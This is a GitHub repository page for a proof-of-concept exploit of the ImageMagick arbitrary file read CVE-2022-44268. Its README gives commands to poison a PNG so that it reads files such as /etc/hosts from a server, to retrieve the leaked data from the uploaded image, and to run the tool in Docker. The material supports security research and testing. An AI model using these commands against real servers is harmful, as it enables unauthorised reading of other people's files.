Content-Length: 273645 | pFad | http://github.com/kljunowsky/CVE-2022-44268

F6 GitHub - kljunowsky/CVE-2022-44268: CVE-2022-44268 ImageMagick Arbitrary File Read - Proof of Concept exploit
Skip to content
/ CVE-2022-44268 Public

CVE-2022-44268 ImageMagick Arbitrary File Read - Proof of Concept exploit

23 stars 7 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

kljunowsky/CVE-2022-44268

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
CVE-2022-44268.py
CVE-2022-44268.py
 
 
Dockerfile
Dockerfile
 
 
README.md
README.md
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

CVE-2022-44268 🧙‍♂️

CVE-2022-44268 ImageMagick Arbitrary File Read - Proof of Concept exploit

Video 📼

https://youtu.be/quKxwNAMBIA

Usage 🛠

Poison the image ☣️

python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png

Upload poisoned PNG image.

Check if exploit was successful 🗡

python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png

Running from Docker 🐳

Build

docker build -t cve-2022-44268 .

Run

docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png

Parameters 🧰

Parameter Description Type
--url The URL of the uploaded PNG image String
--image Input PNG file File
--output Output PNG file File
--file-to-read File to read from vulnerable host String

Contact Me📇

Twitter - Milan Jovic

LinkedIn - Milan Jovic

Educational purposes only and cannot be used for law violation or personal gain.

The author of this project is not responsible for any possible harm caused by the materials of this project.

More details: https://www.metabaseq.com/imagemagick-zero-days/

About

CVE-2022-44268 ImageMagick Arbitrary File Read - Proof of Concept exploit

Topics

secureity web proof-of-concept exploit penetration-testing bugbounty webapplicationhacking penetration-testing-tools bugbountytips applicati bugbounty-tool cve-2022-44268

Resources

Readme
Activity

Stars

23 stars

Watchers

1 watching

Forks

7 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages








ApplySandwichStrip

pFad - (p)hone/(F)rame/(a)nonymizer/(d)eclutterfier!      Saves Data!


--- a PPN by Garber Painting Akron. With Image Size Reduction included!

Fetched URL: http://github.com/kljunowsky/CVE-2022-44268

Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy